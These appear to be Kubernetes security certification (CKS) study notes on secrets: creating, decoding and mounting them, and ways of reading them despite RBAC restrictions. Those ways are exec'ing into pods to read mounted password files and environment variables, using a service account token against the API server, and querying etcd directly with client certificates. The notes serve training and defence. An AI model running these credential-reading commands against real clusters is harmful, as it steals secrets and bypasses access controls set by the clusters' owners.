Hack Secrets - HackMD

# Hack Secrets ###### tags: `CKS Day2` ## 1.创建Secret kubectl create secret generic db-user-pass --from-literal=username=admin --from-literal=password='really-secret-password' ## 2. To decode the values kubectl get secret db-user-pass -o yaml |grep password echo “cmVhbGx5LXNlY3JldC1wYXNzd29yZAo=” | base64 -d kubectl get secret db-user-pass -o jsonpath='{.data.password}' |base64 -d ## 3. Mount 挂载到Pod name redis, container name kvdb1, mount volume name kvdb-secret, mount to /etc/kbdb-secret https://kubernetes.io/docs/concepts/configuration/secret/#using-secrets-as-files-from-a-pod ```yaml apiVersion: v1 kind: Pod metadata: name: mypod spec: containers: - name: mypod image: redis volumeMounts: - name: foo mountPath: "/etc/foo" readOnly: true volumes: - name: foo secret: secretName: mysecret ``` ## Hack Secrets in Docker with no permissions to view RBAC resources ``` k -n restricted get secret ``` ``` Error from server (Forbidden): secrets is forbidden: User "restricted" cannot list resource "secrets" in API group "" in the namespace "restricted" ``` ``` k -n restricted get all ``` ![](https://i.imgur.com/5FCpcNZ.png) ``` k -n restricted exec pod1-fd5d64b9c-pcx6q -- cat /etc/secret-volume/password ``` ``` k -n restricted exec pod2-6494f7699b-4hks5 -- env | grep PASS ``` ``` k -n restricted exec -it pod3-748b48594-24s76 -- sh / # mount | grep serviceaccount tmpfs on /run/secrets/kubernetes.io/serviceaccount type tmpfs (ro,relatime) / # ls /run/secrets/kubernetes.io/serviceaccount ca.crt namespace token ``` ``` / # curl https://kubernetes.default/api/v1/namespaces/restricted/secrets -H "Authorization: Bearer $(cat /run/secrets/kubernetes.io/serviceaccount/token)" -k ... { "metadata": { "name": "secret3", "namespace": "restricted", ... } ] }, "data": { "password": "cEVuRXRSYVRpT24tdEVzVGVSCg==" }, "type": "Opaque" } ... ``` ## Hack Secrets in etcd ``` ETCDCTL_API=3 etcdctl \ --cert /etc/kubernetes/pki/apiserver-etcd-client.crt \ --key /etc/kubernetes/pki/apiserver-etcd-client.key \ --cacert /etc/kubernetes/pki/etcd/ca.crt \ get /registry/secrets/team-green/database-access ``` ## ETCD Encryption